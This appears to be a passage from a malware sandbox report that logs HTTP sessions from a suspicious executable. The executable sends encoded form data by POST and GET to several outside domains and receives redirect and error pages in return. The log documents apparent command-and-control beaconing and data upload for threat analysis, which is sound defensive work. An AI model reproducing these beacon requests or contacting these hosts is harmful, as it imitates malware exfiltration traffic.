                                                    Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.455406217.116.0.191802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:56.253350019 CEST437OUTGET /7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc= HTTP/1.1
                                                    Host: www.lecoinsa.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:31:57.075639009 CEST1236INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:56 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 918
                                                    Connection: close
                                                    Location: http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=
                                                    Age: 0
                                                    X-Cache: MISS
                                                    X-BKSrc: 0.6
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3f 47 54 50 3d 75 68 71 70 6a 78 49 50 68 26 61 6d 70 3b 65 66 4d 3d 62 4e 51 30 2f 4f 4e 53 55 69 7a 38 43 76 65 75 6c 6d 65 65 47 62 74 71 2b 52 59 41 49 52 6e 64 5a 39 4e 55 31 46 6f 4c 58 68 61 33 74 76 37 30 73 35 62 71 75 34 51 36 42 76 35 65 47 70 61 6f 54 44 59 76 62 72 54 31 52 6a 56 37 34 46 36 77 5a 54 56 4f 41 68 71 35 4e 41 76 66 33 33 51 39 41 6e 77 46 32 2b 50 36 62 7a 31 42 4d 55 76 75 33 37 70 4d 37 71 63 3d 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc='" /> <title>Redirecting to http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=">http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6w
                                                    Aug 5, 2024 15:31:57.075690031 CEST65INData Raw: 5a 54 56 4f 41 68 71 35 4e 41 76 66 33 33 51 39 41 6e 77 46 32 2b 50 36 62 7a 31 42 4d 55 76 75 33 37 70 4d 37 71 63 3d 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: ZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=</a>. </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.4554073.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:02.273204088 CEST700OUTPOST /1nsp/ HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.8xbe578.app
                                                    Referer: http://www.8xbe578.app/1nsp/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 7a 4d 4d 74 52 38 6f 66 6b 4c 5a 63 54 75 62 68 55 54 51 70 7a 64 6f 63 65 44 68 49 6f 7a 62 6c 52 4c 6f 5a 30 46 53 31 74 69 37 35 4b 74 63 4d 7a 46 70 38 69 30 59 34 6b 34 43 63 32 54 41 6f 6d 38 2f 69 6c 6b 6b 78 4f 61 6b 79 63 37 74 70 76 46 6a 36 53 66 77 70 49 44 59 78 51 33 34 65 30 50 2f 41 64 6f 42 65 2f 32 41 30 6c 43 66 6a 68 38 71 36 43 57 33 49 55 69 36 69 6f 68 4c 52 34 53 68 78 42 67 54 56 42 6d 54 69 35 39 78 73 76 76 44 53 50 30 71 56 42 6b 78 57 66 41 4f 67 6e 32 44 38 76 4c 72 72 30 79 6b 72 49 32 61 4b 30 43 52 67 6c 41 3d 3d
                                                    Data Ascii: efM=3ubKFab14mRwzMMtR8ofkLZcTubhUTQpzdoceDhIozblRLoZ0FS1ti75KtcMzFp8i0Y4k4Cc2TAom8/ilkkxOakyc7tpvFj6SfwpIDYxQ34e0P/AdoBe/2A0lCfjh8q6CW3IUi6iohLR4ShxBgTVBmTi59xsvvDSP0qVBkxWfAOgn2D8vLrr0ykrI2aK0CRglA==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.4554083.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:04.814971924 CEST720OUTPOST /1nsp/ HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.8xbe578.app
                                                    Referer: http://www.8xbe578.app/1nsp/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 31 73 63 74 43 4c 30 66 6a 72 5a 66 63 4f 62 68 61 44 51 6c 7a 64 6b 63 65 41 74 59 70 42 50 6c 52 71 59 5a 31 42 4f 31 75 69 37 35 53 39 63 4a 2b 6c 70 37 69 30 56 50 6b 34 75 63 32 54 45 6f 6d 2b 6e 69 6b 58 38 79 50 4b 6b 30 56 62 74 76 69 6c 6a 36 53 66 77 70 49 44 6b 58 51 78 51 65 31 36 33 41 63 4a 42 64 35 47 41 33 69 43 66 6a 7a 4d 71 32 43 57 33 68 55 6a 6e 50 6f 69 7a 52 34 54 52 78 41 78 54 57 4c 6d 54 67 6b 74 77 70 72 66 4b 41 47 52 43 56 5a 47 63 77 64 6c 71 44 72 51 53 6d 2b 36 4b 38 6d 79 41 59 56 78 54 2b 35 42 73 70 2b 4e 49 51 6d 7a 41 43 49 6f 6a 4b 58 33 31 6e 5a 51 52 47 65 52 4d 3d
                                                    Data Ascii: efM=3ubKFab14mRw1sctCL0fjrZfcObhaDQlzdkceAtYpBPlRqYZ1BO1ui75S9cJ+lp7i0VPk4uc2TEom+nikX8yPKk0Vbtvilj6SfwpIDkXQxQe163AcJBd5GA3iCfjzMq2CW3hUjnPoizR4TRxAxTWLmTgktwprfKAGRCVZGcwdlqDrQSm+6K8myAYVxT+5Bsp+NIQmzACIojKX31nZQRGeRM=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.4554093.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:07.347879887 CEST10802OUTPOST /1nsp/ HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.8xbe578.app
                                                    Referer: http://www.8xbe578.app/1nsp/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 31 73 63 74 43 4c 30 66 6a 72 5a 66 63 4f 62 68 61 44 51 6c 7a 64 6b 63 65 41 74 59 70 41 33 6c 52 59 51 5a 31 6d 36 31 76 69 37 35 4d 74 63 49 2b 6c 70 71 69 30 4e 4c 6b 34 79 6d 32 52 4d 6f 33 74 76 69 74 47 38 79 47 4b 6b 30 58 62 74 75 76 46 6a 4b 53 66 67 74 49 44 55 58 51 78 51 65 31 37 48 41 5a 6f 42 64 69 47 41 30 6c 43 66 56 68 38 72 70 43 53 54 62 55 6a 54 35 72 53 54 52 34 7a 42 78 43 44 37 57 57 57 54 6d 6e 74 77 50 72 66 58 65 47 56 62 75 5a 43 64 56 64 6a 57 44 37 56 7a 59 6a 37 76 67 37 69 4d 66 50 51 79 59 67 42 6b 6e 78 36 59 4c 71 67 73 70 66 6f 2f 79 66 6c 45 70 64 69 70 69 50 6c 50 70 63 33 4f 6c 47 6e 77 34 49 6e 73 63 47 59 45 70 74 39 4f 78 33 4f 57 35 52 59 46 30 46 33 58 37 54 75 31 76 6f 74 41 44 4b 6a 62 63 61 6b 46 54 59 62 30 61 4f 67 2b 6b 63 70 42 2f 74 7a 53 2b 44 79 49 54 6c 34 41 43 37 2f 4f 39 6c 35 37 4c 47 35 2b 38 64 55 33 73 74 6a 4d 67 47 66 6c 7a 43 59 47 75 66 45 72 32 39 78 4d 55 32 30 79 46 61 4a 56 4a 70 64 [TRUNCATED]
                                                    Data Ascii: efM=3ubKFab14mRw1sctCL0fjrZfcObhaDQlzdkceAtYpA3lRYQZ1m61vi75MtcI+lpqi0NLk4ym2RMo3tvitG8yGKk0XbtuvFjKSfgtIDUXQxQe17HAZoBdiGA0lCfVh8rpCSTbUjT5rSTR4zBxCD7WWWTmntwPrfXeGVbuZCdVdjWD7VzYj7vg7iMfPQyYgBknx6YLqgspfo/yflEpdipiPlPpc3OlGnw4InscGYEpt9Ox3OW5RYF0F3X7Tu1votADKjbcakFTYb0aOg+kcpB/tzS+DyITl4AC7/O9l57LG5+8dU3stjMgGflzCYGufEr29xMU20yFaJVJpdTcFdrM3pFrnA/4qhtAbs69n1jReTIcQXAVkrX0q+iSbwgrr/YFh68jt/PAZqWF4//p0jvJzI0aoScoF9LlPgA6O9L3bClWfzIQc9kIDFOJFi+HK3JsBVCNRQyWGkRdjNiAcGANQWG0aZqZctbhu1C3FdtWuGA/aYGZi9rbCe72tB40BRhmh8RFv04l9+ANDiJbUXwojCKAoBIfD7GRwBoiAbS1wy0H62N6FFGtlOwjeF04X4CtyfwRYtjbMHRr0pA6lUe3eUWwEhvZjOGynqiWoqBUw0heW0b5mjdsEOhc9QX3gOofyQ1sHu4a8Au4gXM9B2ZZTU5RQCqT+yD7KeIdZOP/RUkLu3R2M+m2frs/B38JO5PwijGq7aV63p/nQEwQsAnl7yettZrU6wQSFf65hwoVqr8ADgfzkxeHvU8vY5C2GidDStt38G535GUOkIbXJi8VT/SmWdVgz11OXAZ8UPrLFB2enBm7ut/5L7GLbVyRa5x8OI8pCOb2fi3P/SbJdmUtyksgqkgyhU+z4T7nvboDruMRO7opZkBK3TH4ygBZf/xPReyDqCFDiUUBVKG39Y/D8tSYVI540b8LjfJzlL3jcw//FS0pmjpyTsCQ1mjUEmn78RKghaicmYzimaopEEwyA60gUmMvPbGSFLNJls0HxTS1b9el [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.4554103.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:09.877701998 CEST436OUTGET /1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:11.242788076 CEST393INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:11 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 253
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 66 4d 3d 36 73 7a 71 47 75 6a 31 7a 43 42 53 37 65 45 56 58 36 34 39 69 4a 56 42 55 4c 2f 66 57 7a 45 32 75 2f 4d 32 59 53 70 55 6f 6a 6e 5a 55 64 38 77 6b 6d 43 6c 6c 68 76 78 45 37 45 76 6c 31 46 41 6d 56 39 36 6c 34 47 4f 38 7a 38 33 37 66 75 4e 6b 30 38 30 49 72 39 71 61 4c 5a 55 6e 47 37 79 4e 4f 45 70 4d 54 6b 7a 52 58 67 46 78 37 37 47 63 62 52 6c 69 30 49 3d 26 47 54 50 3d 75 68 71 70 6a 78 49 50 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.455411109.95.158.127802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:16.337836027 CEST709OUTPOST /8unq/ HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.synergon.space
                                                    Referer: http://www.synergon.space/8unq/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 50 4b 59 5a 52 4b 6f 6e 6f 4d 5a 6e 57 7a 2f 6d 43 4a 4b 49 35 73 59 65 38 36 34 67 58 30 4b 6b 65 31 4e 2b 69 30 62 32 6c 38 4e 75 57 61 67 71 4b 2b 6c 4c 57 68 67 52 38 68 75 47 46 59 4a 79 4d 4a 51 43 77 77 4b 7a 35 54 30 36 2b 6f 43 7a 57 45 78 43 6f 76 31 50 67 58 41 72 2b 4a 73 62 46 36 33 6d 4b 38 49 74 73 34 77 70 55 59 38 36 52 64 4b 2b 35 78 48 2f 4e 48 65 50 4b 55 78 54 6c 4c 52 43 36 68 53 6a 44 72 43 73 54 74 71 53 36 57 42 75 6b 7a 77 4c 34 41 4f 74 55 74 78 36 43 6c 61 72 72 35 64 61 73 58 52 39 67 56 65 42 39 61 2f 49 69 67 3d 3d
                                                    Data Ascii: efM=cmHr04oQ6fWhPKYZRKonoMZnWz/mCJKI5sYe864gX0Kke1N+i0b2l8NuWagqK+lLWhgR8huGFYJyMJQCwwKz5T06+oCzWExCov1PgXAr+JsbF63mK8Its4wpUY86RdK+5xH/NHePKUxTlLRC6hSjDrCsTtqS6WBukzwL4AOtUtx6Clarr5dasXR9gVeB9a/Iig==
                                                    Aug 5, 2024 15:32:16.990628004 CEST1043INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 810
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Mon, 05 Aug 2024 13:32:16 GMT
                                                    server: LiteSpeed
                                                    Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                    Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.455412109.95.158.127802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:18.878891945 CEST729OUTPOST /8unq/ HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.synergon.space
                                                    Referer: http://www.synergon.space/8unq/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 48 69 6b 66 56 64 2b 77 78 37 32 6b 38 4e 75 64 36 67 72 45 65 6c 51 57 68 6c 73 38 67 2b 47 46 5a 74 79 4d 49 67 43 77 42 4b 77 72 54 30 34 6c 34 43 78 59 6b 78 43 6f 76 31 50 67 58 56 77 2b 4e 41 62 45 4a 76 6d 4a 5a 38 75 6c 59 77 71 43 49 38 36 48 64 4c 31 35 78 48 52 4e 43 48 59 4b 52 31 54 6c 4c 42 43 2b 6b 79 67 4b 72 43 71 66 39 72 51 2b 6b 73 39 39 44 4e 30 77 44 43 5a 5a 2b 6c 4f 44 6a 4c 78 36 49 38 4e 2b 58 31 4f 39 53 58 31 77 5a 43 42 35 70 49 43 6e 32 77 34 6a 68 63 46 47 6c 38 2b 76 44 52 2f 33 34 38 3d
                                                    Data Ascii: efM=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXHikfVd+wx72k8Nud6grEelQWhls8g+GFZtyMIgCwBKwrT04l4CxYkxCov1PgXVw+NAbEJvmJZ8ulYwqCI86HdL15xHRNCHYKR1TlLBC+kygKrCqf9rQ+ks99DN0wDCZZ+lODjLx6I8N+X1O9SX1wZCB5pICn2w4jhcFGl8+vDR/348=
                                                    Aug 5, 2024 15:32:19.544770956 CEST1043INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 810
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Mon, 05 Aug 2024 13:32:19 GMT
                                                    server: LiteSpeed
                                                    Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                    Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.455413109.95.158.127802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:21.410698891 CEST10811OUTPOST /8unq/ HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.synergon.space
                                                    Referer: http://www.synergon.space/8unq/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 42 36 6b 66 6a 52 2b 7a 58 7a 32 6a 38 4e 75 51 61 67 75 45 65 6c 64 57 6c 78 67 38 6c 6d 34 46 62 6c 79 4d 71 6f 43 32 7a 69 77 68 54 30 34 73 59 43 77 57 45 78 58 6f 76 6c 51 67 58 46 77 2b 4e 41 62 45 50 44 6d 64 63 49 75 6a 59 77 70 55 59 38 6d 52 64 4c 64 35 31 72 6e 4e 47 61 6c 4b 46 42 54 6b 71 78 43 34 41 53 67 46 72 43 6f 65 4e 72 79 2b 6b 68 6c 39 41 34 48 77 41 66 4d 5a 2f 64 4f 42 53 6d 53 6f 70 4d 67 6c 48 39 4d 69 42 2f 74 37 72 71 67 6d 34 67 4f 76 44 67 53 2f 77 59 36 4a 69 56 72 31 78 78 6b 72 4e 68 49 52 32 48 69 2f 50 71 71 74 4f 7a 69 39 30 6b 52 59 74 78 58 2b 74 77 4d 44 49 79 6c 44 31 61 36 78 73 4c 6f 7a 4f 2f 64 32 73 6d 4d 51 45 66 76 47 52 78 44 36 6e 55 51 6f 45 49 75 55 52 70 66 4a 76 67 6e 49 74 61 49 48 38 36 43 36 54 73 49 57 47 43 6e 53 41 7a 70 36 42 4d 44 34 7a 7a 5a 64 6c 31 47 41 68 79 31 79 6e 4b 34 68 4e 53 6a 67 6b 54 5a 61 68 [TRUNCATED]
